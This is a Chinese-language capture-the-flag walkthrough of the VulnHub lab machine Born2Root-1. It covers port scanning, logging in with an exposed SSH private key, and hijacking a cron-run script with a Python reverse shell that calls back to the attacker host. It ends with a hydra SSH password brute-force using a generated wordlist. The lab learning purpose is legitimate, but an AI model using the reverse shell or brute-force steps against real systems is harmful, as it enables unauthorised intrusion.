考点:id_rsa,hydra
靶机链接:https://www.vulnhub.com/entry/born2root-1,197/
环境配置
名称 | IP |
---|
Kali Linux | 10.0.2.24 |
BORN2ROOT-1 | 10.0.2.40 |
初步打点
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| $ export rip=10.0.2.40
$ sudo nmap -v -A -p- $rip
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
| 2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
| 256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|_ 256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries
|_/wordpress-blog /files
|_http-title: Secretsec Company
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 42589/udp status
| 100024 1 44269/udp6 status
| 100024 1 59185/tcp6 status
|_ 100024 1 60456/tcp status
60456/tcp open status 1 (RPC #100024)
|
WEB测试
端口80
获得用户名三个 martin hadi jimmy
访问robots.txt获得两个目录
两个目录都无有用信息
1
| $ gobuster dir --url http://10.0.2.40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php
|
访问icons
目录发现目录可访问
发现ssh登录认证密钥
获得权限
martin
这就尴尬了,查一下这个异常报错是因为DSA密钥的问题,可以修改配置文件 或者ssh登录时加参数 -o PubkeyAcceptedKeyTypes=+ssh-rsa
咋的,还得输入密码,目测是.bashrc
加了登录启动脚本,回车一下绕过了,还是看看这个脚本
下载文件发现wget
和curl
都不能用
还是修改.ssh/config
添加PubkeyAcceptedKeyTypes +ssh-rsa
通过sftp上传linpeas.sh
和pspy
jinmy
通过linpeas.sh
发现
jimmy
权限每隔五分钟运行/tmp/sekurity.py
去/tmp目录发现文件不存在,那就新建文件反弹shell了
新建文件/tmp/sekurity.py
内容为
1
2
3
4
5
6
7
| import sys, socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.0.2.24', 444))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])
|
过了几分钟收到反弹shell
hadi
$ cewl -w pass http://10.0.2.40/
看了看,把martin hadi jimmy
也加到pass里
使用john生成增强字典
$ john --wordlist=pass --rules=best64 --stdout >pass2
使用hydra爆破用户hadi
的密码
$ hydra -l hadi -P pass2 -f 10.0.2.40 ssh
提权
登录上去发现文件.gdb_history
应该是直接可以获得root权限
最后修改于 2017-06-10